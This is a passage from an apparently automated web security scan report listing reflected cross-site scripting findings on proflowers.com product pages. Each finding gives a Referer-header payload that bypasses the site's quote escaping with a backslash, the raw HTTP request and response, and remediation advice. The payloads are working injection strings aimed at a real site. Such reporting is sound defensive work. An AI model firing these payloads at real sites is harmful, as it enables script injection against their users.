The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 683a9\"%3balert(1)//51fd46afcad was submitted in the Referer HTTP header. This input was echoed as 683a9\\";alert(1)//51fd46afcad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Shower-of-Flowers-30004467 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=683a9\"%3balert(1)//51fd46afcad

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=jllbsf32kccvhg5htounxzuu; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=jllbsf32kccvhg5htounxzuu; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pjt-2,cnd-31,pvo-2,pbr-3,psk-1,pps-1,poe-1,zzc-1,pjs-2,pcu-1,pfl-1,mpsmediapersonalitysplit-2,ntd-1,nte-2,ntc-2,peo-1,pfp-1,phr-2,zza-1,psv-4,nta-1,ntb-2,pmo-1,ppr-1,spg-1,xpc-1,psr-2,pcy-6,zzb-2,gfr-1,apg-2,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:55:21 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:55:21 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=135; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:55:21 GMT; path=/
Set-Cookie: PFC_BrowserId=29f2f8b8-464e-4c83-9715-926af73f4f6c; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30004467&12/16/2010 11:55:23 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:55:23 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:55:23 GMT
Connection: close
Content-Length: 149031


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30004467","30004467","30004467","199898","135","organicgglgeneric_683a9\\";alert(1)//51fd46afcad","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pfl-1,cnd-31,pvo-2,pbr-3,pcy-6,psk-1,poe-1,zzc-1,pjs-2,pcu-1,spg-1,mpsmediapersonalitysplit-2,ntd-1,nte-2,ntc-2,peo-1,pfp-1,phr-2,pjt-2,psv-4,
...[SNIP]...

2.150. http://products.proflowers.com/flowers/Sunflower-Radiance-517 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Sunflower-Radiance-517

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28b12\"%3balert(1)//1bc504b2644 was submitted in the Referer HTTP header. This input was echoed as 28b12\\";alert(1)//1bc504b2644 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Sunflower-Radiance-517 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=28b12\"%3balert(1)//1bc504b2644

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=yayccmtkqfyygvyxd1q5wzhq; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=yayccmtkqfyygvyxd1q5wzhq; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-1,pso-1,pjt-1,cnd-34,pvo-1,pbr-3,psk-1,pps-1,poe-1,zzc-2,pjs-3,pcu-1,pfl-2,mpsmediapersonalitysplit-2,ntd-1,nte-2,ntc-2,peo-2,pfp-2,phr-2,zza-2,psv-3,nta-1,ntb-2,pmo-1,ppr-2,spg-1,xpc-1,psr-1,pcy-5,zzb-1,gfr-2,apg-1,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:55:28 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:55:28 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=77; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:55:28 GMT; path=/
Set-Cookie: PFC_BrowserId=d87bc98c-5640-42e0-a4b4-6ab002e7f0df; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=517&12/16/2010 11:55:29 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:55:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:55:29 GMT
Connection: close
Content-Length: 195191


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
adCalendarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("517","517","517","326510","77","organicgglgeneric_28b12\\";alert(1)//1bc504b2644","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-1,pso-1,pfl-2,cnd-34,pvo-1,pbr-3,pcy-5,psk-1,poe-1,zzc-2,pjs-3,pcu-1,spg-1,mpsmediapersonalitysplit-2,ntd-1,nte-2,ntc-2,peo-2,pfp-2,phr-2,pjt-1,psv-3,
...[SNIP]...

2.151. http://products.proflowers.com/flowers/Two-Dozen-Assorted-Long-Stemmed-Roses-wFree-Chocolate-Covered-Oreos-30045998 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Two-Dozen-Assorted-Long-Stemmed-Roses-wFree-Chocolate-Covered-Oreos-30045998

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b964\"%3balert(1)//8deaa1e8cf1 was submitted in the Referer HTTP header. This input was echoed as 6b964\\";alert(1)//8deaa1e8cf1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Two-Dozen-Assorted-Long-Stemmed-Roses-wFree-Chocolate-Covered-Oreos-30045998 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6b964\"%3balert(1)//8deaa1e8cf1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=5hkqludt0ce0ap1dq5cxrukc; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=5hkqludt0ce0ap1dq5cxrukc; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pjt-1,cnd-31,pvo-1,pbr-4,psk-1,pps-2,poe-2,zzc-1,pjs-1,pcu-1,pfl-2,mpsmediapersonalitysplit-1,ntd-2,nte-1,ntc-1,peo-1,pfp-1,phr-2,zza-2,psv-4,nta-2,ntb-2,pmo-1,ppr-1,spg-1,xpc-1,psr-1,pcy-6,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:55:25 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:55:25 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=85; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:55:25 GMT; path=/
Set-Cookie: PFC_BrowserId=d0eb2644-7fc1-4972-8476-a147a61604db; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30045998&12/16/2010 11:55:26 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:55:26 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:55:27 GMT
Connection: close
Content-Length: 148080


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30045998","30045998","30045998","402118","85","organicgglgeneric_6b964\\";alert(1)//8deaa1e8cf1","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pfl-2,cnd-31,pvo-1,pbr-4,pcy-6,psk-1,poe-2,zzc-1,pjs-1,pcu-1,spg-1,mpsmediapersonalitysplit-1,ntd-2,nte-1,ntc-1,peo-1,pfp-1,phr-2,pjt-1,psv-4,
...[SNIP]...

2.152. http://products.proflowers.com/flowers/Winter-Spectacular-7726 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Winter-Spectacular-7726

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a28cd\"%3balert(1)//70ca0164621 was submitted in the Referer HTTP header. This input was echoed as a28cd\\";alert(1)//70ca0164621 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Winter-Spectacular-7726 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a28cd\"%3balert(1)//70ca0164621

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=ihynxzoulao1b424irrnhvl2; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=ihynxzoulao1b424irrnhvl2; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pjt-1,cnd-34,pvo-2,pbr-4,psk-2,pps-2,poe-2,zzc-2,pjs-3,pcu-1,pfl-1,mpsmediapersonalitysplit-2,ntd-2,nte-3,ntc-1,peo-2,pfp-1,phr-2,zza-1,psv-3,nta-2,ntb-2,pmo-1,ppr-1,spg-2,xpc-1,psr-2,pcy-8,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:53:58 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:53:58 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=96; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:53:58 GMT; path=/
Set-Cookie: PFC_BrowserId=e3db21a8-5d20-47d0-b5b8-d249008b8c0f; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=7726&12/16/2010 11:53:59 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:53:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:54:00 GMT
Connection: close
Content-Length: 205199


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
CalendarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("7726","7726","7726","42447","96","organicgglgeneric_a28cd\\";alert(1)//70ca0164621","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pfl-1,cnd-34,pvo-2,pbr-4,pcy-8,psk-2,poe-2,zzc-2,pjs-3,pcu-1,spg-2,mpsmediapersonalitysplit-2,ntd-2,nte-3,ntc-1,peo-2,pfp-1,phr-2,pjt-1,psv-3,
...[SNIP]...

2.153. http://products.proflowers.com/giftbaskets/Holiday-Treasures-Gift-Basket-30043788 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /giftbaskets/Holiday-Treasures-Gift-Basket-30043788

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c502\"%3balert(1)//14d6d713d0a was submitted in the Referer HTTP header. This input was echoed as 1c502\\";alert(1)//14d6d713d0a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /giftbaskets/Holiday-Treasures-Gift-Basket-30043788 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1c502\"%3balert(1)//14d6d713d0a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=1wzv3ojwtsrfeoaor1wspts5; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=1wzv3ojwtsrfeoaor1wspts5; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pjt-1,cnd-32,pvo-1,pbr-3,psk-1,pps-2,poe-1,zzc-1,pjs-1,pcu-1,pfl-2,mpsmediapersonalitysplit-2,ntd-1,nte-1,ntc-2,peo-1,pfp-1,phr-1,zza-2,psv-4,nta-1,ntb-2,pmo-1,ppr-1,spg-2,xpc-1,psr-1,pcy-6,zzb-2,gfr-1,apg-2,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:57:25 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:57:25 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=118; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:57:25 GMT; path=/
Set-Cookie: PFC_BrowserId=214c9b80-a09c-4a05-8a9b-0baf1c99e64d; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30043788&12/16/2010 11:57:27 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:57:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:57:27 GMT
Connection: close
Content-Length: 133606


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30043788","30043788","30043788","402708","118","organicgglgeneric_1c502\\";alert(1)//14d6d713d0a","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pfl-2,cnd-32,pvo-1,pbr-3,pcy-6,psk-1,poe-1,zzc-1,pjs-1,pcu-1,spg-2,mpsmediapersonalitysplit-2,ntd-1,nte-1,ntc-2,peo-1,pfp-1,phr-1,pjt-1,psv-4,
...[SNIP]...

2.154. http://products.proflowers.com/iris/20-Blue-Iris-41587 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /iris/20-Blue-Iris-41587

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35294\"%3balert(1)//98490834e48 was submitted in the Referer HTTP header. This input was echoed as 35294\\";alert(1)//98490834e48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /iris/20-Blue-Iris-41587 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=35294\"%3balert(1)//98490834e48

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=5mqz5kf12izbljeblby0m2py; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=5mqz5kf12izbljeblby0m2py; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pjt-2,cnd-32,pvo-2,pbr-3,psk-1,pps-2,poe-1,zzc-2,pjs-3,pcu-1,pfl-2,mpsmediapersonalitysplit-1,ntd-2,nte-3,ntc-2,peo-1,pfp-1,phr-2,zza-1,psv-4,nta-2,ntb-1,pmo-1,ppr-1,spg-2,xpc-1,psr-2,pcy-6,zzb-1,gfr-1,apg-2,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:56:54 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:56:54 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=83; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:56:54 GMT; path=/
Set-Cookie: PFC_BrowserId=94f1453f-0468-486b-9fad-94567a61544e; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=41587&12/16/2010 11:56:56 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:56:56 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:56:56 GMT
Connection: close
Content-Length: 151574


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
endarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("41587","41587","41587","54534","83","organicgglgeneric_35294\\";alert(1)//98490834e48","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pfl-2,cnd-32,pvo-2,pbr-3,pcy-6,psk-1,poe-1,zzc-2,pjs-3,pcu-1,spg-2,mpsmediapersonalitysplit-1,ntd-2,nte-3,ntc-2,peo-1,pfp-1,phr-2,pjt-2,psv-4,
...[SNIP]...

2.155. http://products.proflowers.com/iris/Assorted-Iris-41275 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /iris/Assorted-Iris-41275

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9762\"%3balert(1)//a99908c5e2b was submitted in the Referer HTTP header. This input was echoed as f9762\\";alert(1)//a99908c5e2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /iris/Assorted-Iris-41275 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f9762\"%3balert(1)//a99908c5e2b

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=tkp2p5gzxyaqdkjw35lg5paf; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=tkp2p5gzxyaqdkjw35lg5paf; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-2,pso-1,pjt-1,cnd-32,pvo-2,pbr-4,psk-1,pps-2,poe-1,zzc-2,pjs-1,pcu-1,pfl-1,mpsmediapersonalitysplit-1,ntd-1,nte-2,ntc-2,peo-1,pfp-2,phr-2,zza-2,psv-3,nta-2,ntb-2,pmo-1,ppr-2,spg-1,xpc-1,psr-1,pcy-5,zzb-1,gfr-2,apg-2,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:57:05 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:57:05 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=14; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:57:05 GMT; path=/
